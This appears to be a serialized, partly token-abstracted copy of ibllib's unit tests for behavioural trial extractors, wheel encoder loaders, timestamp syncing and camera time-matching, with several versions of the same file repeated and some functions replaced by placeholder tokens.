self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n 
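# NOTE (editor): re_ts comes from a 32-bit counter, so a clock reset\n        # shows up as a wrap; the loader is expected to unwrap it, mapping each\n        # raw post-reset value v to v + 2 ** 32, which the next assertion\n        # verifies against the hand-computed values in dat.\n        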
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path 
= self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = camera.attribute_times(tsa, tsb)\n        expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 
52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n 
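# NOTE (editor): taken together, this sum and the one below assert that\n        # exactly one of contrastLeft / contrastRight is NaN on every trial.\n        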
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n 
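# NOTE (editor): ge5 sessions are expected to yield 19 output variables,\n        # versus 15 for the lt5 session above with the wheel extractor mocked.\n        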
self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = 
self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_lt5(file_events)\n            self.assertTrue(dy.size > 6)\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 
0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if 
~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n 